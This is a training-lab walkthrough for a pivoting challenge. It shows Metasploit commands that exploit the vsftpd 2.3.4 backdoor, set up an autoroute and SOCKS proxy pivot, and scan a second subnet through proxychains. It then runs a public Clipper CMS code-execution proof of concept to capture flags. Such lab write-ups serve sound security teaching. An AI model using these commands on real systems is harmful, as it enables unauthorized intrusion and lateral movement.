Network Pivoting using Metasploit and Proxychains
In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!
Network pivoting refers to the process of utilizing a compromised machine, that is connected to multiple networks, to get access to other networks. This approach comes handy when the attacker wants to target the machines on a different subnet.
Lab Scenario
We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.
Lab: Pivoting IV
This lab comprises a Kali machine and two target machines present on two different networks. The user or practitioner will get command-line interface (CLI) access to the Kali machine, through the web browser.
Challenge Statement
In this pivoting challenge, the network architecture is as shown below:
Kali — — — -> Target A — —— — -> Target B
Objective: Your mission is to get the flags kept in flagX.txt file on both Target A and Target B.
Solution
Step 1: Check the IP address of our Kali machine. From the information given in the challenge description, that target A should be located at 192.28.52.3
Command: ip addr
Step 2: Scan target A with Nmap banner grab script. From the output, it is clear that vsftpd and SSH services are running on the machine.
Command: nmap -sV — script=banner 192.28.52.3
Step 3: Start Metasploit and use the vsftpd backdoor exploit. On firing the exploit a command shell session will be established.
Commands:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.28.52.3
exploit
Step 4: This session can be used to find and retrieve the flag hidden on this machine.
Command: find / -name flag*
Step 5: Once the flag is retrieved, check the IP address information of machine A which is needed to create a pivot.
Command: cat /usr/bin/flag1.txt
Flag 1: 6d026e8a09c93a18eca404b834c13991
Step 6: Spawn a meterpreter session by upgrading the current shell session.
Command: sessions -u 1
Step 7: All open sessions can be listed by using sessions command.
Command: sessions
Step 8: Use autoroute module to create a pivot for the other network i.e. 192.72.180.0
Commands:
use post/multi/manage/autoroute
set SUBNET 192.72.180.0
set SESSION 2
exploit
Step 9: To use external tools like Nmap, set up a system-wide proxy by using auxiliary/server/socks4a module. Change the default SRVPORT (i.e. 1080) to match the default port of proxychains i.e. 9050.
Commands:
use auxiliary/server/socks4a
show options
set SRVPORT 9050
exploit
Step 10: Use netstat command to verify that the proxy is running.
Command: netstat -tpln
Step 11: Scan the target B machine using Nmap over proxychains. Remember, no configuration change is needed for proxychains to work because proxychains used port 9050 by default.
Command: proxychains nmap -sT -Pn 192.72.180.3
Step 12: The target B is running HTTP and MySQL services. Check/identify the web app by doing a curl request over proxychains.
Command: proxychains curl http://192.72.180.3
Step 13: The web app running on target B is clipper CMS. Search for clipper CMS exploits, one can easily find a code execution exploit with python POC exploit code which can be used to exploit target B.
Step 14: Save the python POC code in a python file and run it. It requires three parameters i.e. clipper URL, admin username, and password.
Commands:
proxychains python exploit.py http://192.72.180.3/clipper/ admin password
whoami
Step 15: Once we get console on target B machine, we can search and retrieve the flag.
Command: find / -name *flag* 2>/dev/null
Command: cat /tmp/flag.txt
Flag 2: dbaa3f9b469d1315486ca82d6aa300b7
Go beyond walkthroughs with hands-on practice. Subscribe now and gain access to 2000+ lab exercises including this one! We also provide on-demand bootcamps — follow along with instructors as they go through the labs and progressively master in-demand topics regardless of time zone!
